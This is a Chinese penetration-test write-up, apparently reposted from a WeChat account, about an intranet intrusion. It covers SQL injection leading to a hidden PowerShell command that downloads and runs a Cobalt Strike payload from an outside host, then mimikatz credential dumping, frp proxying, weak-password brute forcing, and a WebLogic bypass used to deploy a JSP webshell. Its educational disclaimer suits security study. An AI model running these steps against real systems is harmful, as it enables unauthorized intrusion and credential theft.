免责声明:
由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录!
本文主要记录内网实战学习:
外网到内网:
利用一个dba权限的sql注入,直接远程powershell上线cs
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxx.xxxx.xxx.xxx:8848/a'))"
目标无杀软,可以很顺利上到cs开始多人运动。
内网渗透:
根据上线的cs执行命令,发现目标存在两块网卡:
IPv4 地址 . . . . . . . . . . . . : 10.68.1.102
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.68.1.254
以太网适配器 本地连接 2:
IPv4 地址 . . . . . . . . . . . . : 192.168.101.160
子网掩码 . . . . . . . . . . . . : 255.255.252.0
默认网关. . . . . . . . . . . . . : 192.168.100.1
然后使用cs的模块dump哈希和使用mimikatz抓取密码,成功获取到账号和密码
为方便横向移动,这里采用frp进行反向代理,代理设置了http和socks两种类型
配置代理后,即可进行远程桌面连接,这里的代理工具使用了SocksCap64
然后使用内网大杀器fscan对两个网段进行扫描(需要先上传到目标)
扫描后发现存在的脆弱资产很多,存在很多弱口令,然后利用收集到的账号密码进行爆破
大概思路就是这样,然后使用http代理访问web服务继续进行后渗透。
不出网主机:
在内网中,发现有的机器不出网,根据中继的方法可以使目标主机上线cs:
可以利用已经上线的主机生产一个监听,然后生成对应的beacon木马,在目标上运行即可成功上线(这里使用远程桌面已经连接)
运行后不出网主机即可成功以内网出网主机作为跳板上线cs
部署weblogic获取shell:
在其中发现了一台weblogic主机,使用14882权限绕过漏洞访问到后台,然后通过部署war包进行getshell
war包生成:找一个jsp马,压缩成zip,然后把zip后缀改成war即可
选择上载文件即可
一直下一步即可上传成功,然后使用哥斯拉进行连接:
http://url/test2/test2.jsp
本文始发于微信公众号(Fight Tigers Team):实战渗透-记一次内网渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论